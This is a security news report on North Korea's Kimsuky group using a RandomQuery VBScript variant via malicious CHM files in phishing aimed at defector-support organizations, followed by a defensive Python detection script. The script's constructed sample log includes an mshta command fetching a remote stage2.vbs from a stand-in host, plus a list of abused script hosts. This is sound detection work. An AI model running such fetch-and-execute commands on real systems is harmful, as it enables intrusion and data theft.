Cybersecurity researchers from SentinelOne have revealed that the North Korean APT group Kimsuky is conducting a reconnaissance campaign using a custom variant of its RandomQuery malware. The campaign specifically targets information services and organizations that support human rights activists and North Korean defectors.
According to the researchers, the operation has been ongoing since May 5, 2023 and relies on RandomQuery, a tool built to enumerate files and exfiltrate sensitive data. The attacks begin with phishing emails that impersonate the South Korean news outlet Daily NK, which covers events in North Korea, to lure victims into opening a malicious Microsoft Compiled HTML Help (CHM) file.
Once the CHM file is opened, it executes a Visual Basic script that fetches the second-stage payload, a VBScript variant of RandomQuery, from a remote server. The malware then collects and exfiltrates the following data to the C2 server: system metadata, information about running processes and installed applications, and files from several directories.
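The chain above (CHM opened, script host launched, remote stage fetched) leaves a distinctive parent/child trail in process-creation telemetry. The following detection is an added example and not part of the SentinelOne report; it assumes the CHM is opened by the Windows HTML Help viewer hh.exe and that the VBScript stage is launched through a script host or LOLBin such as mshta.exe or wscript.exe, which is a common CHM abuse pattern but is not detailed in the article. The Sysmon-style log lines, paths, PIDs and the example.invalid URL are all constructed for the demonstration.

```python
"""Flag script hosts spawned (directly or transitively) by hh.exe, the Windows
Compiled HTML Help viewer. Added example, not SentinelOne's detection logic;
all telemetry below is constructed."""
from __future__ import annotations

import json
import re
from typing import Any

# Windows HTML Help viewer; assumption: the victim opens the .chm attachment
# with it, so hh.exe is the root of whatever the CHM launches.
CHM_VIEWER = "hh.exe"

# Script hosts and LOLBins a malicious CHM commonly hands control to.
SUSPICIOUS_CHILDREN = {
    "wscript.exe", "cscript.exe", "mshta.exe",
    "cmd.exe", "powershell.exe", "rundll32.exe",
}

# A URL on the command line suggests the remote second-stage fetch.
URL_RE = re.compile(r"https?://", re.IGNORECASE)

# Constructed Sysmon Event ID 1 (process creation) style records, one JSON
# object per line. Not real telemetry; the URL host is a reserved test name.
SAMPLE_LOG = r"""
{"EventID":1,"ProcessId":4120,"ParentProcessId":1300,"Image":"C:\\Windows\\hh.exe","CommandLine":"\"C:\\Windows\\hh.exe\" C:\\Users\\kim\\Downloads\\dailynk_update.chm","ParentImage":"C:\\Windows\\explorer.exe"}
{"EventID":1,"ProcessId":4188,"ParentProcessId":4120,"Image":"C:\\Windows\\System32\\mshta.exe","CommandLine":"mshta http://example.invalid/stage2.vbs","ParentImage":"C:\\Windows\\hh.exe"}
{"EventID":1,"ProcessId":4210,"ParentProcessId":4188,"Image":"C:\\Windows\\System32\\wscript.exe","CommandLine":"wscript //e:vbscript C:\\Users\\kim\\AppData\\Local\\Temp\\q.vbs","ParentImage":"C:\\Windows\\System32\\mshta.exe"}
{"EventID":1,"ProcessId":5001,"ParentProcessId":1300,"Image":"C:\\Windows\\hh.exe","CommandLine":"\"C:\\Windows\\hh.exe\" C:\\Program Files\\Tool\\help.chm","ParentImage":"C:\\Windows\\explorer.exe"}
{"EventID":1,"ProcessId":5100,"ParentProcessId":1300,"Image":"C:\\Windows\\System32\\notepad.exe","CommandLine":"notepad.exe","ParentImage":"C:\\Windows\\explorer.exe"}
"""


def parse_events(log: str) -> list[dict[str, Any]]:
    """Parse newline-delimited JSON events, skipping blank lines."""
    return [json.loads(line) for line in log.splitlines() if line.strip()]


def image_name(path: str) -> str:
    """Return the lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_chm_script_chains(events: list[dict[str, Any]]) -> list[dict[str, Any]]:
    """Walk the process tree below every hh.exe instance and report any
    descendant that is a script host. Each finding records the root hh.exe
    PID, the depth below it, and whether the command line carries a URL."""
    creations = [e for e in events if e.get("EventID") == 1]
    by_parent: dict[int, list[dict[str, Any]]] = {}
    for ev in creations:
        by_parent.setdefault(ev["ParentProcessId"], []).append(ev)

    findings: list[dict[str, Any]] = []
    for root in creations:
        if image_name(root.get("Image", "")) != CHM_VIEWER:
            continue
        # Depth-first walk over children; a legitimate help file (the second
        # hh.exe above) spawns nothing and therefore produces no finding.
        stack = [(root, 0)]
        while stack:
            node, depth = stack.pop()
            for child in by_parent.get(node["ProcessId"], []):
                name = image_name(child.get("Image", ""))
                cmd = child.get("CommandLine", "")
                if name in SUSPICIOUS_CHILDREN:
                    findings.append({
                        "root_pid": root["ProcessId"],
                        "chm_command": root.get("CommandLine", ""),
                        "pid": child["ProcessId"],
                        "child": name,
                        "depth": depth + 1,
                        "remote_fetch": bool(URL_RE.search(cmd)),
                        "command_line": cmd,
                    })
                stack.append((child, depth + 1))
    return sorted(findings, key=lambda f: f["pid"])


if __name__ == "__main__":
    for hit in find_chm_script_chains(parse_events(SAMPLE_LOG)):
        flag = " [remote fetch]" if hit["remote_fetch"] else ""
        print(f"hh.exe pid {hit['root_pid']} -> {hit['child']} (pid {hit['pid']}, "
              f"depth {hit['depth']}){flag}: {hit['command_line']}")
```

Walking descendants rather than matching only the immediate child matters here: the stage that actually runs the VBScript may sit one hop below the process the CHM launched, as in the constructed mshta.exe to wscript.exe chain, and a rule keyed on hh.exe as the direct parent would miss it. The URL flag is a hint for triage, not a requirement for an alert, since the second stage can also be dropped to disk first.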
North Korean hackers are known for frequent attacks on their southern neighbor: as previously reported, they targeted South Korean politicians and civil servants in April, and a number of South Korean government and financial institutions in March. SentinelOne warns organizations to remain vigilant against phishing emails and to deploy appropriate security measures to protect their systems from attacks of this kind.
Source: SentinelOne report.